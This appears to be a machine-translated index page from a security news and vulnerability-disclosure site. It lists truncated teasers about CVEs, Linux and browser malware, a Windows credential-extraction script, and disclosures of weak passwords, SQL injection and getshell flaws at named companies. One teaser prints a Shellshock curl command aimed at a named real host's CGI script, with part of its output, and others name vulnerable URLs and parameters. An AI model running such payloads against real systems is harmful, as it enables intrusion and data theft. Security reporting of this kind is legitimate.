Cloud Security

Use of FreeBSD Remote DoS attack analysis (CVE-2016-1879)   FreeBSD team announced a serious vulnerability in their operating systems. Hackers can exploit this vulnerability to launch DoS attacks, escalate privileges or steal sensitive system

Apple syslogd Elevation of Privilege Vulnerability, affecting many iOS, OSX versions (CVE-2016-1722)     In the latest iOS 9.2.1 update, Apple fixed a code execution vulnerability found in syslogd by two Zimperium zLabs researchers Nikias Bassen and

Uses Linux kernel information leakage to bypass the kALSR Protection Mechanism I. Preliminary description Because it has been fixed in the Linux kernel, there is no concern about this

Advantech WebAccess File Upload Vulnerability (CVE-2016-0854)Advantech WebAccess File Upload Vulnerability (CVE-2016-0854) Release date:Updated on:Affected Systems: Advantech WebAccess Description: CVE (CAN) ID: CVE-2016-0854WebAccess

OpenSSH ssh_packet_read_poll2 Function Denial-of-Service Vulnerability (CVE-2016-1907)OpenSSH ssh_packet_read_poll2 Function Denial-of-Service Vulnerability (CVE-2016-1907) Release date:Updated on:Affected Systems: OpenSSH Description: CVE

Oracle Sun Solaris Information Leakage Vulnerability (CVE-2016-0618)Oracle Sun Solaris Information Leakage Vulnerability (CVE-2016-0618) Release date:Updated on:Affected Systems: Oracle Sun Solaris 11 Description: CVE (CAN) ID:

Linux new Trojan Ekocms exposure: screenshots taken every 30 seconds Dr. Web, a Russian software vendor, recently discovered the Linux platform's new Trojan Linux. Ekocms.1. From the trojan samples, the Trojan can take screenshots and record audio

IOS & OS X platform Vulnerability Analysis Report: CVE-2016-1722 Describe the discovery and verification process of this vulnerability in CVE-2016-1722.Last week, Apple released iOS 9.2.1, the first update of Apple's security performance on iOS

Noriben sandbox: deal with malware in minutes   We hope that everyone can do better in the new year, especially for faster and more effective analysis of malware. Several years ago, I built a malware analysis sandbox script for daily analysis and

Chrome malicious extensions can monitor users' online behavior Recently, researchers from security company Malwarebytes have investigated a malicious Chrome extension.Malware infected usersThis malicious Chrome extension monitors users' online

A weak password in wasu digital has the risk of data leakage (involving more than 420 million user data) A weak password in wasu digital has the risk of data leakage. Recently captured wasu digital TV source accidentally found apk access to this

A vulnerability in China's talent hotline involves more than 8 million users (including passwords) Bored in the middle of the night, I want to see how my sister paper has been in such a situation for a long time, so this time ...... An

Cookie injection packaging and arbitrary User Password Reading Vulnerability (1.3 million student data) Cookie injection packaging and arbitrary User Password Reading Vulnerability (1.3 million student data) Http://www.17xuexi.com/reg/reg3.asp? Jz_

A weak password in a Midea system causes Getshell to threaten the Intranet. Different port addresses are different systems. WooYun: Getshell is compared to this vulnerability because of a weak password in the marketing system of a dealer in

RWMC: A Windows credential Extraction Tool Using PowerShell RWMC (Reveal Windows Memory Credentials) is a Windows PowerShell script that extracts Windows creden, by using it and the CDB command line option (Windows debugger). In addition, it can be

Midea's bidding and purchasing platform uploads a lot of contract information related to Getshell Rt. No one else has been there yet. You can give it a little more late at night. Http://pur.mideadc.com/ProviderRegister.aspx registration upload, will

SQL Injection (including 820 million + User Data) exists in the main site and sub-stations of retao www) Objective: www.letao.comCheck that SQL Injection exists in the following places: (injection parameter cid, Stacked

Cool music command execution on a site Cool-me command execution on a site Managetest.kuwo.cn bash Command Execution VulnerabilityCurl-A "() {foo;}; echo;/sbin/ifconfig" http://managetest.kuwo.cn/cgi-bin/test-cgiEth0 Link encap: Ethernet HWaddr 00: 1

Sensitive information exposed by thumb play (tens of millions of users have logged on to the management background) 20 Rank + gift? It is also a problem not to handle the vulnerability after confirmation!From: WooYun: thumb games involve improper

Google financial was exposed to the reflection File Download (RFD) Vulnerability     David Sopas, a Portuguese network security expert, found a reflection File Download (RFD) vulnerability that affects Google finance. I found this vulnerability